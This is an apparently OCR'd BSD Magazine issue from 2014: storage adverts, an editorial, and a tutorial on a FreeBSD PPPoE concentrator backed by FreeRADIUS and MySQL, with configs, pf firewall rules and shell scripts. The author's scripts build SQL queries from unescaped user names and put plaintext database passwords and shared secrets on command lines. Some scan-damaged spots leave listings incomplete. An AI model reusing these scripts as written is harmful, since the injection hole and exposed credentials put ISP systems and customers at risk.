HOW IMPORTANT IS YOUR DATA?


Years of family photos. Your entire music and movie collection. Office documents you've put hours of work into. Backups for every computer you own. We ask again, how important is your data?


NOW IMAGINE LOSING IT ALL 


Losing one bit - that's all it takes. One single bit, and your file is gone.

The worst part? You won't know until you absolutely need that file again.


THE SOLUTION 


The FreeNAS Mini has emerged as the clear choice to save your digital life. No other NAS in its class offers ECC (error correcting code) memory and ZFS bitrot protection to ensure data always reaches disk without corruption and never degrades over time.

No other NAS combines the inherent data integrity and security of the ZFS filesystem with fast on-disk encryption. No other NAS provides comparable power and flexibility. The FreeNAS Mini is, hands-down, the best home and small office storage appliance you can buy on the market. When it comes to saving your important data, there simply is no other solution.


Example of one-bit corruption 


The Mini boasts these state-of-the-art features:

- 8-core 2.4GHz Intel® Atom™ processor
- Up to 16TB of storage capacity
- 16GB of ECC memory (with the option to upgrade to 32GB)
- 2x 1 Gigabit network controllers
- Remote management port (IPMI)
- Tool-less design; hot swappable drive trays
- FreeNAS installed and configured


Intel, the Intel logo, Intel Atom and Intel Atom Inside are trademarks of Intel Corporation in the U.S. and/or other countries. 


FREENAS CERTIFIED STORAGE

With over six million downloads, FreeNAS is undisputedly the most popular storage operating system in the world.


Sure, you could build your own FreeNAS system: research every hardware option, order all the parts, wait for everything to ship and arrive, vent at customer service because it hasn't, and finally build it yourself while hoping everything fits - only to install the software and discover that the system you spent days agonizing over isn't even compatible. Or...


MAKE IT EASY ON YOURSELF 


As the sponsors and lead developers of the FreeNAS project, iXsystems has combined over 20 years of hardware experience with our FreeNAS expertise to bring you FreeNAS Certified Storage. We make it easy to enjoy all the benefits of FreeNAS without the headache of building, setting up, configuring, and supporting it yourself. As one of the leaders in the storage industry, you know that you're getting the best combination of hardware designed for optimal performance with FreeNAS.


Every FreeNAS server we ship is...

- Custom built and optimized for your use case
- Installed, configured, tested, and guaranteed to work out of the box
- Supported by the Silicon Valley team that designed and built it
- Backed by a 3-year parts and labor limited warranty


As one of the leaders in the storage industry, you know that you're getting the best combination of hardware designed for optimal performance with FreeNAS. Contact us today for a FREE Risk Elimination Consultation with one of our FreeNAS experts. Remember, every purchase directly supports the FreeNAS project so we can continue adding features and improvements to the software for years to come. And really - why would you buy a FreeNAS server from anyone else?


FreeNAS 1U

- Intel® Xeon® Processor E3-1200v2 Family
- Up to 16TB of storage capacity
- 16GB ECC memory (upgradable to 32GB)
- 2x 10/100/1000 Gigabit Ethernet controllers
- Redundant power supply

FreeNAS 2U

- 2x Intel® Xeon® Processors E5-2600v2 Family
- Up to 48TB of storage capacity
- 32GB ECC memory (upgradable to 128GB)
- 4x 1GbE Network interface (Onboard) - (Upgradable to 2 x 10 Gigabit Interface)
- Redundant Power Supply


http://www.iXsystems.com/storage/freenas-certified-storage/ 


Intel, the Intel logo, the Intel Inside logo and Xeon are trademarks of Intel Corporation in the U.S. and/or other countries. 


EDITOR'S WORD

Hello BSD users,

We, the BSD Mag team, are releasing the new BSD issue. This issue includes the next articles that will upgrade your admin skills. We hope that you will find the articles useful. Our ultimate goal is to provide you with the knowledge and skills you need in your professional careers.

First, I would like to mention that we are publishing the last part of the Unix+ Command article and now you have all that you need to secure your systems and to check what parts are unsecure.

If you need your own centralized server you must read Tiago's article and see how to make it step by step. For the weekend, we recommend starting to play with 3D objects. Rob will show you what you can do and how to use Gimp to create your own images.

I am looking for the next topics for 2015. I'd love to receive your suggestions regarding what articles should be in the next issues of BSD. If you think we've missed a very interesting subject that should be covered, do not hesitate to write to us.

I would like to present more and more Unix-oriented projects so feel free to send your suggestions.

As always, we would like to send a warm "Thank You".

If you want to go on a real life, open source journey with our rich content workshops, publications, tutorials, and so on, or if you want to get in touch with our team, please email us.

Enjoy reading,
Ewa & the BSD Mag Team
IN BUSINESS


FreeNAS 
in an Enterprise Environment 


By the time you're reading this, FreeNAS has been downloaded more than 5.5 million times. For home users, it's become an indispensable part of their daily lives, akin to the DVR. Meanwhile, all over the world, thousands of businesses, universities, and government departments use FreeNAS to build effective storage solutions in myriad applications.

What you will learn...

- How TrueNAS builds off the strong points of the FreeBSD and
- How TrueNAS meets modern storage challenges for enterprise

(The right-hand side of the following column is cut off in the scan.)

The FreeNAS operating system is fre
the public and offers thorough doc
active community, and a feature-ri
the storage environment. Based on Free
can share over a host of protocols (SM
FTP, iSCSI, etc) and features an intuiti
the ZFS file system, a plug-in system
much more.
Despite the massive popularity
aren't aware of its big brother
data in some of the most demand
environments: the proven, enterp
professionally-supported line of
But what makes TrueNAS diff
Well, I'm glad you asked...

Commercial Grade Supp
When a mission critical stor
organization's whole operat
and running in a timely
responsiveness and expe
Created by the sa
developed FreeNAS.

WE INTERRUPT THIS MAGAZINE TO BRING YOU THIS IMPORTANT ANNOUNCEMENT:

THE PEOPLE WHO DEVELOP FREENAS, THE WORLD'S MOST POPULAR STORAGE OS, HAVE JUST REVAMPED TRUENAS.

POWER WITHOUT CONTROL MEANS NOTHING. TRUENAS STORAGE GIVES YOU BOTH.

- Simple Management
- Self-Healing Filesystem
- Hybrid Flash Acceleration
- High Availability
- Intelligent Compression
- Qualified for VMware and HyperV
- All Features Provided Up Front (no hidden licensing fees)
- Works Great With Citrix XenServer®

To learn more, visit: www.iXsystems.com/truenas


VMware and VMware Ready are registered trademarks or trademarks of VMware, Inc. in the United States and other jurisdictions.
CONTENTS


Tiago Felipe Goncalves 

Tiago, in his article, presents how to use a PPPoE Concentrator Dual-Stack (v4/v6) based on open source software for small and midsize Internet service providers. He will also describe how to make a FreeRadius centralized server and will cover its settings, since they are essential for the concentrator's operation.


Rob Somerville 
The next part of our Gimp series will be about 3D objects. In this article, Rob will give you more 
information about how to create a realistic 3D object for a FreeBSD carton that is print ready. 


Craig S. Wright 

The last part of Craig’s article will give you insight into Pen Testing and Audits. Craig will present 
the Netcat tool. Netcat has a number of pre-existing scripts that can allow it to act as a simple 
vulnerability scanner. It does this by connecting to the port to be tested, entering data to test a 
vulnerability and returning the result. 


Michael Ortega 

Application Security testing tools are often the best solution for security professionals tasked with 
securing applications throughout the Software Development Lifecycle (SDLC). This is where we 
introduce Acunetix! As a precursor to the remainder of this article, Michael has had the opportunity 
to work with a number of Application Security tools for large enterprises. 


Rob Somerville 


Performance and reliability is critical

Download syslog-ng Premium Edition product evaluation here

Attend a free logging tech webinar here

BalaBit IT Security
www.balabit.com

syslog-ng log server
The world's first High-Speed Reliable Logging™ technology

HIGH-SPEED RELIABLE LOGGING

- above 500 000 messages per second
- zero message loss due to the Reliable Log Transfer Protocol™
- trusted log transfer and storage

The High-Speed Reli


PPPoE Concentrator Dual-Stack!

The case below is about how to run a PPPoE Concentrator Dual-Stack (v4/v6) based on open source software for small and midsize internet service providers. We will also describe how to set up a FreeRadius centralized server (briefly, because the focus is the concentrator) and will cover its settings, since they are essential for the concentrator's operation.

The concentrator is based on FreeBSD 10.0-RELEASE #15, using mpd5, pf (containing a set of firewall rules for administration with the support, sysadmin, infrastructure, blocked users to redirect to an information block page, customers behind nat44 - I'm not adept, but with the lack of IPv4 addresses that is inevitable nowadays, normalization of packets and some security filters), recursive dns, snmp for data collection, quagga running zebra, ospf, ospf6 for redistribution, a web interface system for reading authentication logs, a web interface to support customers, and a public or private (nat44), fixed or dynamic ip pool system.

Figure 1. Server load average on the results (graph of processes in the run queue, from 2014/11/21 04:47:27 to 2014/11/22 05:11:54)

Hardware: buy hardware according to your needs. If you do not understand your needs very well, there is no magic to solve your problems. The FreeRadius server needs fast disks, preferably SAS and a safe array (raid10 fits the data well), large memory, as it can optimize mysql, and a good NIC. I believe that nowadays 32GB is accessible to everyone.

The PPPoE concentrator is a case of great myths, but what really matters is that the higher the frequency, the better your income and, if combined with appropriate NICs, many cores are essential to the concentrator's operation. HD and memory, anything goes. I'm using 2x Intel(R) Xeon(R) CPU E5506 @ 2.13GHz (this processor is not appropriate because of the low frequency, but it was what I had at the time) and two Intel I350-T4 network adapters.

Results: ~3500 PPPoE clients, ~450Mbps and 100Kpps.

Mathematical estimate of what we could reach with this server: ~7000 customers and/or ~900Mbps.

Just as a reminder, we have more options. I used several concentrators redistributed through ospf and several FreeRadius server redundancies through carp and mysql, doing master-master redundancy, and this is not a rule; it depends on your infrastructure. And if you need better results, invest in 6 or 8 cores and Intel X540 or X520 NICs.

Tests were performed with firewalls controlling bandwidth: ipfw through dummynet, and pf using altq with several dynamic anchors due to the unique sense of control provided by altq. The results obtained with pf were better than the results obtained with ipfw, but with pf the administration can get very confusing and not scalable when the number of customers increases.

Other tests were performed with ng_bpf and ng_car traffic control, and in these cases the results obtained in performance and scalability were amazing!

I thank the community that continues to contribute to open source, as the main reason for this publication is "knowledge must be open"! I would like to cite all references and ideas that many searches showed me, but nothing compares to the FreeBSD Developers Handbook and a blog that always has valuable information: https://calomel.org/ - it's well worth reading because it helped me a lot and helps in my day to day with BSD and networks. In particular, I thank the collaboration with my best friend Marcos Buzo, who helped me a lot along the way and is always beneficial (Listing 1).

Figure 2. Simple topology to implement the hub

Let's start with FreeRadius!

This is the configuration of a simple, valid and functional server. I have put in some files that were not strictly needed, only as a reference in case you have questions; the necessary settings are the following. Edit rc.conf with some settings and startup daemons (Listing 2).

Compile a new kernel:

# cd /usr/src/sys/amd64/conf/
# mkdir -p /root/kernels/
# cp GENERIC /root/kernels/yggdrasil
# ln -s /root/kernels/yggdrasil .

Add these lines to the kernel:

# vi /root/kernels/yggdrasil
device pf
device pflog
device pfsync

# cd /usr/src
# make buildkernel KERNCONF=yggdrasil
# make installkernel KERNCONF=yggdrasil

Listing 1.

The mentioned address blocks are reserved for documentation - RFC 5737.

The block 203.0.113.0/24 (TEST-NET-3) will represent public and routable addresses.
The block 198.51.100.0/24 (TEST-NET-2) will represent private addresses for communication with the Radius (yggdrasil.connectionlost.com.br) server.
The block 192.0.2.0/24 (TEST-NET-1) will represent private addresses for nat use with customers (I am against it, but unfortunately in a few cases we do have to use it).

The mentioned IPv6 address prefix is reserved for documentation - RFC 3849.

I am using an alias block 198.51.100.0/24 on the interface, but this flow could be segregated in a vlan or interface for security purposes.

Addresses configuration:

Gateway: 203.0.113.1

Radius:
Host: yggdrasil.connectionlost.com.br
Public IP: 203.0.113.2/24
Radius IP: 198.51.100.2/24

Concentrator:
Host: valhalla.connectionlost.com.br
Public IP: 203.0.113.5/24
Public IPv6: 2001:db8::[unreadable in the scan]/32
Radius IP: 198.51.100.5/24
Private IP: 192.0.2.5/24
Radius local loopback IP: 198.51.100.[unreadable in the scan]/32

Sysadmin IP: 203.0.113.69/24
Sysadmin IPv6: 2001:db8::cafe/32

Infrastructure IP: 203.0.113.10/24

Monitoring server IP: 203.0.113.[unreadable in the scan]/24
Monitoring server IPv6: 2001:db8::10/32

Webserver IP: 203.0.113.[unreadable in the scan]/24
Webserver IPv6: 2001:db8::[unreadable in the scan]/32


Listing 2.
# cat /etc/rc.conf
hostname="valhalla.connectionlost.com.br"
ifconfig_igb0="inet 203.0.113.2 netmask 255.255.255.0"
ifconfig_igb0_alias0="inet 198.51.100.2 netmask 255.255.255.0"
defaultrouter="203.0.113.1"
gateway_enable="YES"
pf_enable="YES"
pf_rules="/etc/pf.conf"
pf_flags=""
pflog_enable="YES"
pflog_flags=""
pflog_logfile="/var/log/pflog"
mysql_enable="YES"
mysql_args="[unreadable in the scan] --skip-name-resolve"
sshd_enable="YES"
radiusd_enable="YES"
[unreadable in the scan]_enable="YES"
ntpd_enable="YES"
postfix_enable="YES"
sendmail_enable="NO"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"
daily_clean_hoststat_enable="NO"
daily_status_mail_rejects_enable="NO"
daily_status_include_submit_mailq="NO"
daily_submit_queuerun="NO"
#eof
Listing 3.
# vi /usr/local/etc/my.cnf
[client]
port = 3306

[mysqld]
port = 3306
skip-locking
max_allowed_packet = 4M
query_cache_size = 8M
thread_concurrency = 4
max_connections = 500
query_cache_limit = 1M
max_heap_table_size = 32M
key_buffer_size = 384M
[several buffer/cache size lines are unreadable in the scan]

# 7 very important lines
innodb_file_per_table
innodb_flush_method=O_DIRECT
innodb_log_file_size=1G
innodb_buffer_pool_size=4G
log = /var/log/mysqld.log
log_slow_queries = /var/log/mysqld.slow.log
log-error = /var/log/mysqld.error.log

long_query_time=2
datadir = /store/db/mysql
skip-locking
log-bin=mysql-bin
server-id = 2
innodb_data_home_dir = /store/db/mysql/
innodb_data_file_path = ibdata1:10M:autoextend
innodb_additional_mem_pool_size = 64M
innodb_log_file_size = [unreadable in the scan]
innodb_log_buffer_size = 64M
innodb_flush_log_at_trx_commit = 1
innodb_lock_wait_timeout = 500

[mysqldump]
quick
max_allowed_packet = 24M

[mysql]
no-auto-rehash

[isamchk]
key_buffer = 384M
sort_buffer_size = 64M
read_buffer = 2M
write_buffer = 2M

[myisamchk]
key_buffer = 64M
sort_buffer_size = 64M
read_buffer = 2M
write_buffer = 2M

[mysqlhotcopy]
interactive-timeout
#eof

Let's create the log files:

# touch /var/log/mysqld.log
# touch /var/log/mysqld.slow.log
# touch /var/log/mysqld.error.log
# chown mysql:mysql /var/log/mysqld.log
# chown mysql:mysql /var/log/mysqld.slow.log
# chown mysql:mysql /var/log/mysqld.error.log
Listing 4.

# cat /etc/pf.conf
# ext if
ext_if = "igb0"
ext_ip = [unreadable in the scan]
ext_if_radius = [unreadable in the scan]
ext_ip_radius = [unreadable in the scan]

# tables
table <ssh_abuse> persist

# private ips tables, be careful to not block yourself
table <martians> { [address list unreadable in the scan] }

ssh_extport = "2220"

set block-policy drop
set loginterface $ext_if
set fingerprints "/etc/pf.os"
set skip on lo0

scrub in all fragment reassemble max-mss 1460
scrub out random-id max-mss 1460

# drop packets with illegal TCP flag combinations
block in log quick proto tcp flags FUP/WEUAPRSF
block in log quick proto tcp flags WEUAPRSF/WEUAPRSF
block in log quick proto tcp flags SRAFU/WEUAPRSF
block in log quick proto tcp flags /WEUAPRSF
block in log quick proto tcp flags SR/SR
block in log quick proto tcp flags SF/SF
block in quick from urpf-failed

# try to block nmap scans
block in log quick on $ext_if proto tcp from any to any flags FUP/FUP

# block RFC 1918 addresses
block drop in log (all) quick on $ext_if from <martians> to any
block drop in log (all) quick on $ext_if_radius from <martians> to any
block drop out log (all) quick on $ext_if from any to <martians>
block drop out log (all) quick on $ext_if_radius from any to <martians>

# ssh abuse
block in log quick from <ssh_abuse>

block log all

# release and mark output
pass out keep state

# lo0
pass quick on lo0 all

# icmp type 8
pass in on $ext_if inet proto icmp from { 203.0.113.[unreadable in the scan] } to $ext_ip icmp-type 8 code 0
pass in on $ext_if_radius inet proto icmp from { 203.0.113.[unreadable in the scan] } to $ext_ip_radius icmp-type 8 code 0

# ospf
pass proto ospf from 203.0.113.0/24 to any

# allow out the default range for traceroute (8):
# "base+nhops*nqueries-1" (33434+64*3-1)
pass out on $ext_if inet proto udp from any to any port 33433 >< 33626 keep state
pass out on $ext_if_radius inet proto udp from any to any port 33433 >< 33626 keep state

# monitoring
pass quick proto { tcp udp } from 203.0.113.[unreadable in the scan] to any keep state

# sql/radius
pass on $ext_if_radius proto { tcp, udp } from 198.51.100.[unreadable in the scan] to [unreadable in the scan] keep state

# ssh
pass in log on $ext_if proto tcp from any to $ext_ip port $ssh_extport flags S/SA keep state (max-src-conn 10, max-src-conn-rate 3/5, overload <ssh_abuse> flush)
pass in log on $ext_if_radius proto tcp from any to $ext_ip_radius port $ssh_extport flags S/SA keep state (max-src-conn 10, max-src-conn-rate 3/5, overload <ssh_abuse> flush)
#eof


BSD MAGAZINE 11/2014


Listing 5.

# vi /root/scripts/pod_drop.sh
#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

if [ -z "$1" ]
then
echo "Usage: $0 {customer}"
exit 1
fi

radius="/usr/local/bin/mysql -u userradius -h localhost radius -psenharadius -s -N -e"

# most recent open accounting row for the customer: user, session id, NAS address
c_drop=$($radius "SELECT Username, AcctSessionId, NASIPAddress FROM radacct WHERE username='$1' AND acctstoptime IS NULL ORDER BY acctstarttime DESC limit 1;")

username=$(echo $c_drop | awk '{print $1}')
session=$(echo $c_drop | awk '{print $2}')
nas=$(echo $c_drop | awk '{print $3}')

if [ "$nas" != "" ]
then
echo "Acct-Session-Id=$session, User-Name=$username, NAS-IP-Address=$nas" | radclient -x $nas:3799 disconnect [CoA secret unreadable in the scan]
fi

#eof


Listing 6.

# vi /root/scripts/coa_change.sh
#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

if [ -z "$1" ]
then
echo "Usage: $0 {customer} {down speed in kbyte} {up speed in kbyte}"
exit 1
else
if [ -z "$2" ]
then
echo "Usage: $0 {customer} {down speed in kbyte} {up speed in kbyte}"
exit 1
else
if [ -z "$3" ]
then
echo "Usage: $0 {customer} {down speed in kbyte} {up speed in kbyte}"
exit 1
fi
fi
fi

radius="/usr/local/bin/mysql -u userradius -h localhost radius -psenharadius -s -N -e"

c_coa=$($radius "SELECT Username, AcctSessionId, NASIPAddress FROM radacct WHERE username='$1' AND acctstoptime IS NULL ORDER BY acctstarttime DESC limit 1;")

username=$(echo $c_coa | awk '{print $1}')
session=$(echo $c_coa | awk '{print $2}')
nas=$(echo $c_coa | awk '{print $3}')

# rate plus normal burst (nb) and excess burst (eb) for the mpd rate-limit
vdown=$(echo $2"000")
vdown_nb=$(echo "$vdown*0.125" | bc | cut -d. -f1)
vdown_eb=$(echo "$vdown*[factor unreadable in the scan]" | bc | cut -d. -f1)
vup=$(echo $3"000")
vup_nb=$(echo "$vup*0.125" | bc | cut -d. -f1)
vup_eb=$(echo "$vup*[factor unreadable in the scan]" | bc | cut -d. -f1)

echo User-Name=$username,mpd-limit += \"in#1=all rate-limit $vup $vup_nb $vup_eb\",mpd-limit += \"out#1=all rate-limit $vdown $vdown_nb $vdown_eb\" | radclient -x $nas:3799 coa [CoA secret unreadable in the scan]

#eof
We will install the necessary packages. Install mysql-server on your FreeBSD:

# cd /usr/ports/databases/mysql51-server/
# make install clean

Install freeradius:

# cd /usr/ports/net/freeradius2/
# make install clean

Remember to enable mysql in radius.

This is an example file for mysql, feel free to change it: Listing 3.

I will post on my blog a perl script that helps with tuning mysql; it's not the case with that server because the hardware is well below expectations.

Check it out when you can: www.connectionlost.com.br.

Let's set up a firewall (it can vary greatly depending on your infrastructure), as this is an important point of our infrastructure: Listing 4.

Now let's go over some scripts needed to make everything work.

This script is used to generate PoD packets, or Packet of Disconnect (disconnect users): Listing 5.

Permissions to be executable:

# chmod +x /root/scripts/pod_drop.sh

This script is used to generate CoA packets, or Change of Authorization (in this case, the script changes the speed of the client without dropping it): Listing 6.

Permissions to be executable:

# chmod +x /root/scripts/coa_change.sh
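As an added illustration, not the author's code, here is what pod_drop.sh and coa_change.sh ask radclient to put on the wire, written in Python against RFC 5176: it builds the Disconnect-Request and CoA-Request packets with their Request Authenticator, encodes the mpd-limit vendor attribute under the mpd vendor number from dictionary.mpd, and checks the Ack or Nak the concentrator returns by its Response Authenticator (so a reply from the wrong secret, or for a different request, is not mistaken for success). The shared secret, user, session and NAS values are constructed; using rate/8 for both the normal and excess burst is an assumption, since the burst factors in Listing 6 are not fully readable.

```python
"""RADIUS Disconnect-Request / CoA-Request builder and reply checker (RFC 5176)."""
import hashlib
import hmac
import struct

# Packet codes from RFC 5176
DISCONNECT_REQUEST, DISCONNECT_ACK, DISCONNECT_NAK = 40, 41, 42
COA_REQUEST, COA_ACK, COA_NAK = 43, 44, 45

# Attribute types used by pod_drop.sh / coa_change.sh
ATTR_USER_NAME = 1
ATTR_NAS_IP_ADDRESS = 4
ATTR_VENDOR_SPECIFIC = 26
ATTR_ACCT_SESSION_ID = 44
ATTR_ERROR_CAUSE = 101
MPD_VENDOR_ID = 12341   # vendor number from mpd's dictionary.mpd
MPD_LIMIT = 7           # mpd-limit vendor attribute (string)


def avp(attr_type, value):
    """Encode one Type-Length-Value attribute; Length counts the 2-byte header."""
    if len(value) > 253:
        raise ValueError("attribute value too long")
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def avp_ipv4(attr_type, dotted):
    return avp(attr_type, bytes(int(o) for o in dotted.split(".")))


def avp_vsa(vendor_id, vendor_type, value):
    """Vendor-Specific: 4-byte Vendor-Id followed by a vendor TLV."""
    inner = struct.pack("!BB", vendor_type, len(value) + 2) + value
    return avp(ATTR_VENDOR_SPECIFIC, struct.pack("!I", vendor_id) + inner)


def build_request(code, identifier, secret, attributes):
    body = b"".join(attributes)
    header = struct.pack("!BBH", code, identifier, 20 + len(body))
    # Request Authenticator = MD5(Code + ID + Length + 16 zero octets + Attributes + Secret)
    authenticator = hashlib.md5(header + bytes(16) + body + secret).digest()
    return header + authenticator + body


def build_reply(code, request, secret, attributes=()):
    """What the NAS sends back; its authenticator covers the request's authenticator."""
    body = b"".join(attributes)
    header = struct.pack("!BBH", code, request[1], 20 + len(body))
    authenticator = hashlib.md5(header + request[4:20] + body + secret).digest()
    return header + authenticator + body


def verify_reply(reply, request, secret):
    """True only if the reply matches our request's ID and carries a valid Response Authenticator."""
    if len(reply) < 20:
        return False
    code, ident, length = struct.unpack("!BBH", reply[:4])
    if length != len(reply) or ident != request[1]:
        return False
    expected = hashlib.md5(reply[:4] + request[4:20] + reply[20:] + secret).digest()
    return hmac.compare_digest(expected, reply[4:20])


def parse_attributes(data):
    """Decode a TLV attribute list into {type: [value, ...]}; rejects truncated lengths."""
    attrs = {}
    while data:
        attr_type, length = data[0], data[1]
        if length < 2 or length > len(data):
            raise ValueError("malformed attribute")
        attrs.setdefault(attr_type, []).append(data[2:length])
        data = data[length:]
    return attrs


def disconnect_request(identifier, secret, username, session_id, nas_ip):
    """The packet pod_drop.sh sends: User-Name, Acct-Session-Id and NAS-IP-Address."""
    return build_request(DISCONNECT_REQUEST, identifier, secret, [
        avp(ATTR_USER_NAME, username.encode()),
        avp(ATTR_ACCT_SESSION_ID, session_id.encode()),
        avp_ipv4(ATTR_NAS_IP_ADDRESS, nas_ip),
    ])


def coa_rate_limit_request(identifier, secret, username, up_bps, down_bps):
    """The packet coa_change.sh sends; burst = rate/8 is an assumption (see lead-in)."""
    limits = []
    for direction, rate in (("in", up_bps), ("out", down_bps)):
        burst = rate // 8
        text = f"{direction}#1=all rate-limit {rate} {burst} {burst}".encode()
        limits.append(avp_vsa(MPD_VENDOR_ID, MPD_LIMIT, text))
    return build_request(COA_REQUEST, identifier, secret,
                         [avp(ATTR_USER_NAME, username.encode())] + limits)
```

Port 3799 in the scripts is the RFC 5176 default for these requests; whatever sends them should only count a session as dropped or re-limited after verify_reply() accepts a Disconnect-ACK or CoA-ACK, and should read Error-Cause (attribute 101) out of a NAK rather than retrying blindly.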


This script will help you if you have many clients with multiple logins. For large quantities, it can disrupt the functioning of your concentrator, but it does away with worries about simultaneous logins and the FreeRadius problems (Listing 7). Permissions to be executable:

# chmod +x /root/scripts/mpp.sh

To run it, put it in your cron or use screen:

# screen -dmS mpp /root/scripts/mpp.sh
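Added example, not the article's mpp.sh: the same detection in Python over constructed radius.log lines, with the radacct update done as a parameterised query, so a user name containing a quote is closed correctly instead of breaking the statement that the shell script builds by interpolating $mpp. The table layout and the log lines are constructed stand-ins for radacct and for the FreeRADIUS 2 "Multiple logins ... [MPP attempt]" message (the bracketed user name is awk field 14, which is what mpp.sh extracts).

```python
"""Detect FreeRADIUS 2 multiple-login events and close the user's stale accounting rows."""
import re
import sqlite3

# FreeRADIUS 2 logs a simultaneous-use rejection as
# "Multiple logins (max N) [MPP attempt]: [user] (from client ... port ...)"
MPP_LINE = re.compile(r"Multiple logins \(max \d+\) \[MPP attempt\]: \[([^\]]+)\]")


def extract_mpp_user(line):
    """Return the user name from an MPP log line, or None for any other line."""
    match = MPP_LINE.search(line)
    return match.group(1) if match else None


def close_stale_sessions(conn, username, now):
    """Mark the user's open accounting rows as stopped; bound parameters, no string-built SQL."""
    cur = conn.execute(
        "UPDATE radacct SET acctstoptime = ? WHERE acctstoptime IS NULL AND username = ?",
        (now, username),
    )
    return cur.rowcount


def process_log(conn, lines, now):
    """Feed log lines through the detector; return {user: rows closed}."""
    closed = {}
    for line in lines:
        user = extract_mpp_user(line)
        if user is not None:
            closed[user] = closed.get(user, 0) + close_stale_sessions(conn, user, now)
    return closed


def open_sessions(conn):
    return conn.execute("SELECT COUNT(*) FROM radacct WHERE acctstoptime IS NULL").fetchone()[0]


def sample_db():
    """In-memory stand-in for radius.radacct with constructed rows (a subset of the real columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE radacct (username TEXT, acctsessionid TEXT, nasipaddress TEXT, "
                 "acctstarttime TEXT, acctstoptime TEXT)")
    conn.executemany("INSERT INTO radacct VALUES (?, ?, ?, ?, ?)", [
        ("jdoe", "5474a6f0", "198.51.100.5", "2014-11-22 07:39:00", None),  # open, stale
        ("jdoe", "5474a000", "198.51.100.5", "2014-11-21 07:00:00", "2014-11-21 09:00:00"),
        ("asmith", "5474b111", "198.51.100.5", "2014-11-22 07:30:00", None),  # open, fine
        ("o'brien", "5474c222", "198.51.100.5", "2014-11-22 07:35:00", None),  # open, stale
    ])
    return conn


SAMPLE_LOG = [  # constructed lines in the FreeRADIUS 2 radius.log format
    "Sat Nov 22 07:40:00 2014 : Auth: Login OK: [asmith] (from client valhalla port 12)",
    "Sat Nov 22 07:40:01 2014 : Auth: Multiple logins (max 1) [MPP attempt]: [jdoe] (from client valhalla port 13)",
    "Sat Nov 22 07:40:02 2014 : Auth: Login incorrect: [bob/bad] (from client valhalla port 14)",
    "Sat Nov 22 07:40:03 2014 : Auth: Multiple logins (max 1) [MPP attempt]: [o'brien] (from client valhalla port 15)",
]


def demo():
    """Run the detector over the sample log; returns (rows closed per user, sessions still open)."""
    conn = sample_db()
    closed = process_log(conn, SAMPLE_LOG, "2014-11-22 07:40:03")
    return closed, open_sessions(conn)
```

In production the lines would come from following /var/log/radius.log, as mpp.sh does with tail -f; the UPDATE is the same one the script issues, and the author's warning about stopping the script during backups that lock the database applies equally here.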


If you have a backup script or something that can generate a big lock on your database, remember to stop this script and start it again after execution.

Now let's configure FreeRadius: Listing 8.

Now we need to create a database in mysql for FreeRadius. This is the required schema: Listing 9. Create the database:

# mysql -u root -p
mysql> create database radius;
mysql> grant all privileges on radius.* to 'userradius'@'localhost' identified by 'senharadius';
mysql> grant all privileges on radius.* to 'userradius'@'198.51.100.5' identified by 'senharadius';

Give access to the key that we will create on the concentrator, so that the web cgi works properly: Listing 10.


Figure 3. NetFlow data - packets on the results (graph of packets/s, any protocol, Sat Nov 22 07:40:00 2014; all: 86.2 k/s, tcp: 69.3 k/s)
Listing 7.

# cat mpp.sh
#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

radius="/usr/local/bin/mysql -u root -h localhost radius -psenharadius -s -N -e"

c_coa=$($radius "SELECT Username, AcctSessionId, NASIPAddress FROM radacct WHERE username='$1' AND acctstoptime IS NULL ORDER BY acctstarttime DESC limit 1;")
tail -f /var/log/radius.log | while read line
do
# field 14 of a "Multiple logins ... [MPP attempt]" line is the bracketed user name;
# the sed strips the brackets (the exact expression is unreadable in the scan)
mpp=$(echo $line | grep MPP | awk '{print $14}' | sed 's/\[//;s/\]//')
if [ "$mpp" != "" ]
then
$radius "update radacct set acctstoptime=now() where acctstoptime is null and username='$mpp';"
echo "MPP client - $mpp"
fi
done

#eof


Listing 8.
# vi /usr/local/etc/raddb/clients.conf
client localhost {
ipaddr = 127.0.0.1
secret = testing123
require_message_authenticator = no
shortname = localhost
nastype = other
}
client 198.51.100.5 {
shortname = valhalla
secret = senhaclienteradius
nastype = other
}
#eof

# vi /usr/local/etc/raddb/dictionary
$INCLUDE /usr/local/share/freeradius/dictionary
$INCLUDE /usr/local/share/freeradius/dictionary.mpd
#eof

# vi /usr/local/share/freeradius/dictionary.mpd
#
# dictionary.mpd
#
VENDOR mpd 12341
BEGIN-VENDOR mpd
ATTRIBUTE mpd-rule 1 string
ATTRIBUTE mpd-pipe 2 string
ATTRIBUTE mpd-queue 3 string
ATTRIBUTE mpd-table 4 string
ATTRIBUTE mpd-table-static 5 string
ATTRIBUTE mpd-filter 6 string
ATTRIBUTE mpd-limit 7 string
ATTRIBUTE mpd-input-octets 8 string
ATTRIBUTE mpd-input-packets 9 string
ATTRIBUTE mpd-output-octets 10 string
ATTRIBUTE mpd-output-packets 11 string
ATTRIBUTE mpd-link 12 string
ATTRIBUTE mpd-bundle 13 string
ATTRIBUTE mpd-iface 14 string
ATTRIBUTE mpd-iface-index 15 integer
ATTRIBUTE mpd-input-acct 16 string
ATTRIBUTE mpd-output-acct 17 string
ATTRIBUTE mpd-action 18 string
ATTRIBUTE mpd-peer-ident 19 string
ATTRIBUTE mpd-iface-name 20 string
ATTRIBUTE mpd-iface-descr 21 string
ATTRIBUTE mpd-iface-group 22 string
ATTRIBUTE mpd-drop-user 154 integer
END-VENDOR mpd
#eof

# vi /usr/local/etc/raddb/radiusd.conf
prefix = /usr/local
exec_prefix = ${prefix}
sysconfdir = ${prefix}/etc
localstatedir = /var
sbindir = ${exec_prefix}/sbin
logdir = /var/log
raddbdir = ${sysconfdir}/raddb
radacctdir = ${logdir}/radacct
name = radiusd
confdir = ${raddbdir}
run_dir = ${localstatedir}/run/${name}
db_dir = ${raddbdir}
libdir = /usr/local/lib/freeradius-2.2.4
pidfile = ${run_dir}/${name}.pid
user = freeradius
group = freeradius
max_request_time = 30
cleanup_delay = 5
max_requests = 12800
listen {
# valid types: auth acct proxy detail status coa
type = auth
ipaddr = [unreadable in the scan]
port = 0
}
listen {
ipaddr = 198.51.100.2
port = 0
type = acct
}
hostname_lookups = no
allow_core_dumps = no
regular_expressions = yes
extended_expressions = yes
log {
destination = files
